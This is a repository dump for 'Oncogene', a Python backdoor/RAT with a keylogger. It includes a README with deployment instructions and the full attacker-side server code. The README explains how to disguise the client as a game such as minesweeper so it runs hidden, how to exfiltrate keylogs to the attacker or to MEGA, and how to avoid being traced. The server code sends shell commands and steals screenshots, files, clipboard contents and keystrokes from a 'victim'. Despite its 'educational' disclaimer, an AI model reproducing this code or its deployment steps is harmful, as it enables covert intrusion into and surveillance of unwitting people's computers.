README.md
# Oncogene

Logo								  | Main Menu
:-----------------------------------: | :-----------------------------------:
![](./documentation/logo.png)     | ![](./documentation/menu.png)

# DISCLAIMER

**Oncogene is meant to be used only for educational/research purposes. I am not responsable for any kind of damage caused by this tool.
Downloading this means that you agree to use it at YOUR OWN RISK. Use this tool locally on your own enviromnent.
Thanks.**

# About Oncogene

A simple Windows/Linux backdoor/RAT + KeyLogger written in Python using sockets.

# NOTE
I've developed Oncogene in a Linux environment, it may not work under other systems. This backdoor targets Windows (and now even Linux!) but the attacker should use Linux. 

## How does it work?

![](./documentation/diagram.png)

The attacker runs the Oncogene python script which starts a socket server on a specific port, it must be the same one as the one that the client (or the victim) will use to connect to the attacker's server.

Once a connection has been established the attacker can execute some commands such as screenshotting the victim's desktop, downloading and uploading files, getting a simple shell and so on.

## Instructions

In order to use this tool you need to tweak some things inside the scripts: inside clientwin.py/clientlinux.py you must replace the value for the Server IP. You can change the port number if you want, the default one is 1234. Inside oncogene.py everything should be fine, the script grabs automatically the host's IP address; you may need to change this value inside /etc/hosts since it can't be localhost. If you plan to use the non-default backup feature then inside backup.py you need to change the values for email and password. Inside the defualt backup feature b2.py you need to modify the server's IP address. Don't worry about what those features are, scrool down and find the explaination. 

If you want to deploy the malware then inside launcher.py you need to change the paths for the .exe that you will create. Scroll down to the "Deploying" section where I will explain you how to setup everything.

Check the comments inside the source code to guide yourself through the setup process.

### Deploying Oncogene

In order to deploy this malware you need to get dirty hands: you need to pack the code into an executable Windows file.

NOTE: if you want to pack it for Linux systems the steps are the same but the files will be different (as there are no .exe in Linux). Launcher.py has been developed for Windows, the backup feature on the other hand can be used for Linux too.

#### You need:
- Pyinstaller 
- A Windows machine for packing in .exe OR a Linux machine if you want to make Linux files

Once the requirements are satisfied you have to run these commands inside a CMD instance:

#### Run

```
pyinstaller --onefile --noconsole launcher.py
```

```
pyinstaller --onefile --noconsole b2.py
```

You can even use backup.py if you want. B2 is the defualt one which I reccomend.

```
pyinstaller --onefile --noconsole clientwin.py
```

Go grab the 3 .exe inside the newly created "dist" folder and place them together in a folder you want. You can leave them there if you want but I suggest you to move them into another folder.

#### Front program

Once this is done you need to grab a front-program, this will be the .exe that the victim will interact with not knowing that a malware is running in the background. It can be whatever you want, I personally used minesweeper. You can grab a free copy of it on the Internet.

#### Done!

Modify the things that I described into the "Instruction" section and you are ready to deploy this malware!

If you just want to test this backdoor without packing everything inside executables then you can just run the python scripts.

![](./documentation/packaging.png)

Let's imagine that you want to distribute this malware (you shouldn't).

The launcher.exe is the main file, the idea is to rename it to whatever you want (for example: minesweeper.exe): you want to fool the victim by making him launch the game exe which, in reality, launches the front program exe (the real minesweeper.exe) and the backdoor.exe in a hidden window instance. Basically, to the victim's eye will appear only the real program interface but the backdoor will be ran in a hidden way in the background.

Closing the real program window WON'T stop the backdoor (that's the cool part); to stop it you have to terminate the process in TaskManager or by choosing the option "--close" on the attacker's side.

There's also a backup feature to retreive the keylogger files if the target stops the backdoor: the launcher.exe will also run a small script (in .exe format) which will try to send the logs to the attacker. Scroll down to find the dedicated section.

This applies to Linux too, just with different files.

#### Linux Support

Now thath Oncogene has support for Linux systems you can pack the script into a Linux executable. Follow the same steps above, you may want to modify the launcher.py since it's meant to be for Windows machines. The steps are bascially the same, if you need help contact me!

## What's inside this repo?

There are mainly 3 Python scripts excluding the displayBanner and mainMenu files: "oncogene.py" for the attacker (Linux), "clientwin.py" for Windows machines and clientlinux.py for Linux systems.

## Features

* Reverse Shell
* Get target information (OS, IP..)
* Shutdown the target
* Screenshot
* Upload files
* Download files in a zip archive
* Get Key Logger logs
* Run additional Python scripts
* Close the connection
* Get clipboard

### Windows only!

* Kill processes (TaskManager) 
* Display a message box 
* Lock PC 

## Requirements

### Server

* socket
* sys
* os
* time
* ZipFile

### Client (Python script)

* socket
* subprocess
* sys
* os
* ctypes
* platform
* threading
* time
* mss
* ZipFile
* Pynput
* pyperclip -> ( + xsel and xclip for Linux)

### Client (.exe)

Everything should work even without having Python installed

## Run

### Server

```
python3 oncogene.py
```

### Client (Python script)

Windows

```
python3 clientwin.py 
```
Or if you only have python3

```
python clientwin.py
```

Linux

```
python3 clientlinux.py
```

## Backup feature

I've implemented two ways of retreiving the keylogger files if the connnection gets cut, so even if the victim stops the backdoor you are able to get the keylogger files in two different ways: by establishing another connection to the victim on a different port (with another script) or by using my backup script that uploads the logs to MEGA. You obviously need a MEGA account.

The first option is the DEAFULT one, so if you want to use the second you have to do a little bit of tweaking: you need to comment out the backupConnection function in the Oncogene.py file and replace the "backupexe" path in the launcher script with the correct .exe (the MEGA one).

## Why did I build it?

I was working on a simple terminal-based chat application using sockets in Python (soon available) and I thought about all I could do with sockets without the user even knowing.
The 'dark idea' quickly got me hooked up in the cybersecurity world and I decided to build this tool to test my abilities. I remind you that I AM A BEGINNER in Python and this isn't a perfectly written piece of code so feel free to give me advice but please DON'T BE RUDE.
Thanks for downloading and using Oncogene!

## What about the name?

An oncogene is a gene that has the potential to cause cancer. In tumor cells, these genes are often mutated, or expressed at high levels.

So this tool lies behind a "normal" program and once activated it can cause severe damage to the victim.

## Use case scenario

This is a simple yet powerful way to attack a computer (but remember: hacking people is easier than hacking PCs!). The user downloads a "front-program" distribuited by the attacker with hidden inside this backdoor: A script runs both the "normal" program and the backdoor at the same time using threads. Once the attacker gets a connection the numbers of possible actions is pretty huge.

Oncogene can also be used for transferring files easily, monitoring and controlling a PC remotely with the consent of the user. 

_Is your son playing too much videogames?_

_Just shutdown his computer remotely with Oncogene!_

## Advantages of Oncogene

Keep in mind that Oncogene isn't a super sophisticated tool but it is:

* Light weight  
* Fast
* Easy to use, to understand and to modify
* FREE
* Costantly under development

## COMING SOON!

- Keylogger files encryption

Some people suggested me to use argparse to avoid setting things manually inside the code but there's a problem: if you plan on deploying it with the method that I've explained before then atgparse doesn't make sense.

## FAQs

### _Can I (attacker) be tracked?_

Yes. If someone sniffs the connection between the server and the client it can go back to the server's IP. One solution might be running Oncogene on a "neutral" machine and connect to it securely with a VPN or with Tor.

### _Who are you?_

I am just a teenager who loves learning and testing his abilities.

#### Ask me anything!

## LICENSE

[License](./LICENSE)

### Thanks

I would like to thank my IT school teacher who constantly helps and supports me.


CHANGELOG.md
# Changelog
All notable changes to this project will be documented in this file.

The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).

# Note
This changelog is pretty "young", I didn't keep it when I started the projects a long while ago.

## [Released]
## [0.6.0] - 2020-04-12
## Added
- support for Linux targets

## [0.5.0] - 2020-04-11
## Added
- handled ConnectionResetError for more stability
- sleep functions to avoid buffer congestion

## [0.4.0] - 2020-04-10
### Added
- More stability in case of force quit

## [0.3.0] - 2020-04-07
### Added
- feature to hide the keylogger files
- comments inside the code to explain it better

## [0.2.0] - 2020-03-30
### Added 
- Sleep functions to avoid congesting the buffer while sending commands fast.

## [0.1.0] - 2020-03-29
### Added
- "Reapeat in case of error" to the download feature so the program doesn't crash
- Support for KeyboardInterrupt while receiving the keylogger logs (you can ctrl + c).
### Changed
- '?' to '#' inside checkConnection() due to the fact thath there's a chance of it getting added to python scripts [ UPDATE: FIXED  -> this was caused by buffer congestion ]


src/mainMenu.py
class colors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
    WHITE = '\033[1;97m'

def mainMenu():
    print("+--------------------------------------------------------------+")
    print(f"{colors.OKGREEN}[+] Choose an option:" + '\n')
    print(f"{colors.OKGREEN}--shell" + f"{colors.ENDC} : Get a shell")
    print(f"{colors.OKGREEN}--ginfo" + f"{colors.ENDC} : Get target info")
    print(f"{colors.OKGREEN}--shutdown" + f"{colors.ENDC} : Shutdown target")
    print(f"{colors.OKGREEN}--close" + f"{colors.ENDC} : Close connection")
    print(f"{colors.OKGREEN}--screenshot" + f"{colors.ENDC} : Take a screenshot")
    print(f"{colors.OKGREEN}--upload" + f"{colors.ENDC} : Upload a file to the victim's machine")
    print(f"{colors.OKGREEN}--download" + f"{colors.ENDC} : Download victim's files")
    print(f"{colors.OKGREEN}--run" + f"{colors.ENDC} : Run python scrypt on the victim's machine")
    print(f"{colors.OKGREEN}--kill" + f"{colors.ENDC} : Kill processes" + f"{colors.WARNING} [WINDOWS ONLY]")
    print(f"{colors.OKGREEN}--msg" + f"{colors.ENDC} : Open message box" f"{colors.WARNING} [WINDOWS ONLY]")
    print(f"{colors.OKGREEN}--lock" + f"{colors.ENDC} : Lock PC" f"{colors.WARNING} [WINDOWS ONLY]")
    print(f"{colors.OKGREEN}--stop" + f"{colors.ENDC} : Stop key logger")
    print(f"{colors.OKGREEN}--ccb" + f"{colors.ENDC} : Get clipboard content")
    print(f"{colors.OKGREEN}--getlogs" + f"{colors.ENDC} : Get key logger logs" + '\n')
    print(f"{colors.FAIL}esc" + f"{colors.ENDC} : Exit")
    print("__________________________" + '\n' + "> ", end = '')


src/displayBanner.py
class colors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
    WHITE = '\033[1;97m'

def banner():
    version = "0.6.0"
    githublink = "https://github.com/f0lg0/Oncogene"

    print("\n+--------------------------------------------------------------+\n")

    LOGO = [
        "|--- ONCOGENE ----|",
        " \---------------/ ",
        "  ~-_---------_-~  ",
        "     ~-_---_-~		",
        "        ~-_   		",
        "     _-~---~-_     ",
        "  _-~---------~-_  ",
        " /---------------\	",
        "|-----------------|"
    ]

    BANNER = [
        "       |",
        "       |   Welcome to Oncogene",
        f"       |   Version: {version}",
        "  |",
        f"  |   {githublink}",
        "       |",
        "       |   Written by: f0lg0",
        "  |",
        f"       |   {colors.FAIL}[!] Only for educational purposes",
    ]

    for llogo, lbanner in zip(LOGO, BANNER):
        print(colors.OKGREEN + colors.BOLD + llogo, colors.OKBLUE + colors.BOLD + lbanner)

    print(colors.ENDC)
    print("\n+--------------------------------------------------------------+")



src/oncogene.py
"""

+-----------------------------------------------------------------------+
|                               ONCOGENE                                |
|    Author: f0lg0                                                      |
|    Version: 0.5.0                                                     |
|    Last update: 12-04-20 (dd-mm-yyy)                                  |
|                                                                       |
|                 [   ONLY FOR EDUCATIONAL PURPOSES   ]                 |
+-----------------------------------------------------------------------+

------- CONFIGURATION ------
In order to use this tool you need to do some tweaking:
    1. The Server's IP gets automatically set by taking the address from /etc/hosts (Linux), check if your LAN address exists in this file. I had to put it manually since there was only localhost.
    2. Select a PORT number, the default value setted in the client file is 1234
    3. Play around with the paths, I've set some default values but you can change them

------ NOTE ------
This code was tested and developed on a Linux machine, it may not work on other machines.

"""
import socket
import sys
import os
import time

from zipfile import ZipFile
from displayBanner import banner
from mainMenu import mainMenu


class Server:
    def __init__(self, ip, port, buffer_size):
        self.IP = ip
        self.PORT = port
        self.BACKUP_PORT = 8080
        self.BUFFER_SIZE = buffer_size

        self.connections = [] # connections list
        self.info = "" # info about target
        self.recvcounter = 0 # counter for received files

        self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    def startServer(self):
        self.server.bind((self.IP, self.PORT))
        self.server.listen(1)

        self.acceptConnections()

    def acceptConnections(self):
        print("*** Listening for incoming connections ***")

        self.client_socket, self.address = self.server.accept()
        print(f"*** Connection from {self.address} has been established! ***")
        self.connections.append(self.client_socket)

        self.choose()

    def checkConnection(self):
        """ Checks periodically if the client is up by sending random data """

        try:
            self.client_socket.send("#".encode("utf-8"))
            time.sleep(0.1) # sleep to avoid data congestion

            return True
        except Exception:
            """ Target disconnected beacuse it has not responded to the message """

            print(f"[!] {self.address[0]} disconnected")
            self.client_socket.close()

            return False

    def closeConnection(self):
        self.connections.remove(self.client_socket)
        self.client_socket.close()
        self.server.close()

    def choose(self):
        """ Main Menu """

        flag = False # flag to avoid checking if connection is up, if false then check otherwise not
        while True:
            if flag == False:
                if self.checkConnection() == False:
                    """ Client is down, trying to receive backup data (logs) """

                    try:
                        self.backupConnection()
                    except KeyboardInterrupt:
                        print("\n[ STOPPED RECEIVING DATA ]")
                    except:
                        print("[!] Client closed the backup process. He's onto you!")
                    break
            else:
                # flag is true so skipping checking and re-setting the flag to false
                flag = False

            mainMenu()

            i = input()

            if i == '--shell':
                try:
                    self.reverseShell()
                    os.system("clear")
                except ConnectionResetError:
                    """ if the target hard-closes the connection we will receive only a RST packet (TCP), so here we close the connection safely """
                    
                    self.closeConnection() # we are not breaking because there's the backup feature at the begging of the loop, just to avoid repeating lines of code. Obviuosly the checkConnection will return false
                except:
                    print("[!] Something went wrong.")

            elif i == '--ginfo':
                try:
                    self.info = self.getTargetInfo()
                    print("*** Done ***")
                except ConnectionResetError:
                    self.closeConnection() # same here and so on in the code
                except:
                    print("[!] Something went wrong.")

            elif i == '--shutdown':
                try:
                    self.shutdownTarget()
                except:
                    print("[!] Something went wrong.")

            elif i == '--close':
                try:
                    self.disconnectTarget()
                except:
                    print("[!] Something went wrong.")

                while True:
                    fireup = input("*** Do you want to start the listener again [y/n]?")

                    if fireup == "y":
                        self.info = "" # clear info about target
                        self.connections.remove(self.client_socket) # removing old connection

                        try:
                            """ Getting backup data """
                            self.backupConnection()
                        except KeyboardInterrupt:
                            print("\n[ STOPPED RECEIVING DATA ]")

                        self.acceptConnections()
                    elif fireup == "n":
                        self.server.close()
                        break
                    else:
                        print("[!] Invalid choice, retry.")

                try:
                    self.backupConnection()
                except KeyboardInterrupt:
                    print("\n[ STOPPED RECEIVING DATA ]")
                except:
                    print("[!] Client closed the backup process. He's onto you!")

                break

            elif i == '--screenshot':
                try:
                    self.takeScreenshot()
                except ConnectionResetError:
                    self.closeConnection()
                except:
                    print("[!] Something went wrong.")

            elif i == '--upload':
                try:
                    self.uploadFile()
                except:
                    print("[!] Something went wrong.")

            elif i == '--run':
                try:
                    self.runFile()
                except ConnectionResetError:
                    self.closeConnection()
                except:
                    print("[!] Something went wrong.")

            elif i == '--download':
                try:
                    self.downloadFiles()
                except ConnectionResetError:
                    self.closeConnection()
                except:
                    print("[!] Something went wrong")

            elif i == '--kill':
                try:
                    if self.info == "win32": # works only for Windows machines
                        self.killProcessWin()
                    elif self.info == "":
                        print("[!] Get target info!")
                    else:
                        print("[!] Not a Windows machine")
                except ConnectionResetError:
                    self.closeConnection()

            elif i == '--msg':
                try:
                    if self.info == "win32":
                        self.sendOsMessage()
                    elif self.info == "":
                        print("[!] Get target info!")
                    else:
                        print("[!] Not a Windows machine")
                except ConnectionResetError:
                    self.closeConnection()

            elif i == '--lock':
                try:
                    if self.info == "win32":
                        self.lockWindows()
                    elif self.info == "":
                        print("[!] Get target info!")
                    else:
                        print("[!] Not a Windows machine")
                except ConnectionResetError:
                    self.closeConnection()

            elif i == '--stop':
                try:
                    self.stopKeyLogger()
                except ConnectionResetError:
                    self.closeConnection()

            elif i == '--getlogs':
                try:
                    self.getKeyLogs()
                except ConnectionResetError:
                    self.closeConnection()
                except:
                    print("[!] Something went wrong")

            elif i == '--ccb':
                try:
                    self.getClipBoard()
                except ConnectionResetError:
                    self.closeConnection()
                except:
                    print("[!] Something went wrong")

            elif i == 'esc':
                self.server.close()
                sys.exit()
            else:
                print("[!] Invalid choice, retry.")
                flag = True  # skip checking connection

        sys.exit()

    # try to update the buffer with recv sized
    def updateBuffer(self, size):
        buff = ""
        for counter in range(0, len(size)):
            if size[counter].isdigit():
                buff += size[counter]

        return int(buff)

    # for files bigger than buffer
    def saveBigFile(self, size, buff):
        full = b''
        while True:
            if sys.getsizeof(full) >= size:
                break

            recvfile = self.client_socket.recv(buff)

            full += recvfile

        return full

    def getTargetInfo(self):
        command = "--ginfo"
        self.client_socket.send(command.encode("utf-8"))

        info = self.client_socket.recv(self.BUFFER_SIZE).decode("utf-8")
        more = self.client_socket.recv(self.BUFFER_SIZE)

        """ writing additional information in a file """

        with open('../receivedfile/info.txt', 'wb+') as f:
            f.write(more)

        print("\n# OS:" + info)
        print("# IP:" + self.address[0])
        print("*** Check info.txt for more details on the target ***")

        return info

    def shutdownTarget(self):
        command = ""

        if self.info == "win32":
            command = "shutdown /s"
            self.client_socket.send(command.encode("utf-8"))

            self.client_socket.close()
            print(f"[!] {self.address[0]} has been shut off")
        elif self.info == "linux":
            command = "shutdown -h now"
            self.client_socket.send(command.encode("utf-8"))

            self.client_socket.close()
            print(f"[!] {self.address[0]} has been shut off")
        else:
            print("[!] Shutdown command not known.")
            print("*** Try to get more informations on the target ***")

    def disconnectTarget(self):
        command = "--esc"

        self.client_socket.send(command.encode("utf-8"))
        print("*** Killed")

    def takeScreenshot(self):
        command = "--takescreen"
        self.client_socket.send(command.encode("utf-8"))

        # recv file size
        recvsize = self.client_socket.recv(self.BUFFER_SIZE)
        size = recvsize.decode("utf-8")
        time.sleep(0.1)

        # updating buffer
        buff = self.updateBuffer(size)

        # getting the file
        print("*** Saving screenshot ***")
        fullscreen = self.saveBigFile(int(size), buff)

        # saving the file
        with open(f'../receivedfile/{time.time()}.png', 'wb+') as screen:
            screen.write(fullscreen)

        print("*** File saved ***")

    def uploadFile(self):
        while True:
            try:
                path = input("[+] Enter file path: ")

                if not os.path.exists(path):
                    raise FileNotFoundError
                else:
                    break
            except FileNotFoundError:
                print("[!] File not found, retry")

        command = "--recv"
        self.client_socket.send(command.encode("utf-8"))

        name = input("[+] Save to victim as: ") # file name, must include extension
        self.client_socket.send(name.encode("utf-8"))

        with open(path, 'rb') as f:
            # sending file size
            fsize = os.path.getsize(path)
            size = str(fsize)
            self.client_socket.send(size.encode("utf-8"))
            time.sleep(0.1)

            # sending file
            print("*** Sending file ***")
            sfile = f.read()
            self.client_socket.send(sfile)

        print("*** File sent ***")

    def runFile(self):
        """ Run python file in a hidden window """

        command = "--run"
        self.client_socket.send(command.encode("utf-8"))

        exfile = input("[+] Enter file path: ")
        self.client_socket.send(exfile.encode("utf-8"))
        print("*** File path sent.")

        # get feedback
        print("*** Receiving response ***")
        response = self.client_socket.recv(self.BUFFER_SIZE)
        print("*** " + response.decode("utf-8") + " ***")

    def downloadFiles(self):
        command = "--download"
        self.client_socket.send(command.encode("utf-8"))

        path = input("[+] Enter path (NOT A SINGLE FILE): ")
        self.client_socket.send(path.encode("utf-8"))

        response = self.client_socket.recv(self.BUFFER_SIZE)
        if response.decode("utf-8") == "OK":
            # recv size
            size = self.client_socket.recv(self.BUFFER_SIZE).decode("utf-8")
            time.sleep(0.1)

            if int(size) <= self.BUFFER_SIZE:
                # recv archive
                archive = self.client_socket.recv(self.BUFFER_SIZE)
                print("*** Got file ***")

                with open(f'../receivedfile/received{str(self.recvcounter)}.zip', 'wb+') as output:
                    output.write(archive)

                print("*** File saved ***")
                self.recvcounter += 1

            else:
                # update buffer
                buff = self.updateBuffer(size)

                # recv archive
                fullarchive = self.saveBigFile(int(size), buff)

                print("*** Got file *** ")
                with open(f'../receivedfile/received{str(self.recvcounter)}.zip', 'wb+') as output:
                    output.write(fullarchive)

                print("*** File saved ***")
                self.recvcounter += 1
        else:
            print(response.decode("utf-8"))

    # task manager
    def killProcessWin(self):
        command = "--kill"
        self.client_socket.send(command.encode("utf-8"))

        procname = input("[+] Enter process name: ")
        self.client_socket.send(procname.encode("utf-8"))

        status = self.client_socket.recv(self.BUFFER_SIZE).decode("utf-8")
        print(status)

    # message box
    def sendOsMessage(self):
        """ Send a UI mesage to the target, Windows has these message boxes """

        command = "--msg"
        self.client_socket.send(command.encode("utf-8"))

        msg = input("[+] Enter message: ")
        self.client_socket.send(msg.encode("utf-8"))

        status = self.client_socket.recv(self.BUFFER_SIZE).decode("utf-8")
        print(status)

    # locks the user out while keeping connection up
    def lockWindows(self):
        command = "--lock"
        self.client_socket.send(command.encode("utf-8"))

        response = self.client_socket.recv(self.BUFFER_SIZE).decode("utf-8")
        print(response)

    def stopKeyLogger(self):
        command = "--stop"
        self.client_socket.send(command.encode("utf-8"))

        response = self.client_socket.recv(self.BUFFER_SIZE).decode("utf-8")
        print(response)

    def getKeyLogs(self):
        """ Receiving the keylogger files """

        command = "--getlogs"
        self.client_socket.send(command.encode("utf-8"))

        flag = self.client_socket.recv(self.BUFFER_SIZE).decode("utf-8")
        if flag == "[OK]":
            # recv size
            size = self.client_socket.recv(self.BUFFER_SIZE).decode("utf-8")
            time.sleep(0.1)

            if int(size) <= self.BUFFER_SIZE:
                # recv archive
                archive = self.client_socket.recv(self.BUFFER_SIZE)
                print("*** Got logs ***")

                with open('../receivedfile/keylogs.zip', 'wb+') as output:
                    output.write(archive)

                print("*** Logs saved ***")

            else:
                # update buffer
                buff = self.updateBuffer(size)

                # recv archive
                fullarchive = self.saveBigFile(int(size), buff)

                print("*** Got logs ***")
                with open('../receivedfile/keylogs.zip', 'wb+') as output:
                    output.write(fullarchive)

                print("*** Logs saved ***")
        else:
            print("[!] FATAL: Logs do not exist!")

    def getClipBoard(self):
        """ Get victim' clipboard in plain text """

        command = "--ccb"
        self.client_socket.send(command.encode("utf-8"))

        # recv clipboard
        cb = self.client_socket.recv(self.BUFFER_SIZE)
        print("*** Got clipboard ***")

        with open('../receivedfile/cb.txt', 'w+') as f:
            f.write(cb.decode("utf-8"))

        print("*** Wrote it to cb.txt ***")

    def reverseShell(self):
        """ This is not a real interactive shell, you get the output
        of the command but you can't interact with it """

        print("[!] --back to exit shell")
        while True:
            command = input(f"[{self.address[0]}]$ ")

            if not command:
                print("[!] Can't send empty command.")
                continue

            if command.lower() == "--back":
                break

            self.client_socket.send(command.encode("utf-8"))

            output = self.client_socket.recv(self.BUFFER_SIZE)

            if not output:
                self.connections.remove(self.client_socket)
                self.client_socket.close()
                self.server.close()
                break

            print(output.decode("utf-8"))

    def backupConnection(self):
        """ Creating a new socket to receive the key logger files in case the main connection
            gets cut """

        while True:
            print("*** Trying to receive keylogger logs... ***")

            newserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            newserver.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            newserver.bind((self.IP, self.BACKUP_PORT))
            newserver.listen(1)
            newserver.settimeout(60) # to avoid being stuck in a loop if the backup feature gets killed too
            try:
                clientbackup, addr = newserver.accept()
            except socket.timeout:
                print("*** Connection timed out, the backup feature has been closed. They are onto you! ***")
                break

            # recv size
            size = clientbackup.recv(self.BUFFER_SIZE).decode("utf-8")
            time.sleep(0.1)

            if int(size) <= self.BUFFER_SIZE:
                # recv
                logs = clientbackup.recv(self.BUFFER_SIZE)

                with open(f'../receivedfile/backup.zip', 'wb+') as output:
                    output.write(logs)

                print("*** Keylogger files saved on this machine. ***")

                clientbackup.close()
                newserver.close()
                break

            else:
                # update buffer
                buff = self.updateBuffer(size)

                # recv
                full = b''
                while True:
                    if sys.getsizeof(full) >= int(size):
                        break

                    recvfile = clientbackup.recv(buff)

                    full += recvfile

                with open(f'../receivedfile/backup.zip', 'wb+') as output:
                    output.write(full)

                print("*** Keylogger files saved on this machine. ***")

                clientbackup.close()
                newserver.close()
                break


def main():
    """ Creating the necessary dirs """

    try:
        os.mkdir('../receivedfile')
    except FileExistsError:
        pass

    banner()
    time.sleep(1)

    HOSTNAME = socket.gethostname()
    IP = socket.gethostbyname(HOSTNAME)
    PORT = int(input("[+] Listen on port> "))
    BUFFERSIZE = 2048

    server = Server(IP, PORT, BUFFERSIZE)

    try:
        server.startServer()
    except Exception as e:
        print("*** Error while starting the server:", str(e) + " ***")


if __name__ == "__main__":
    main()
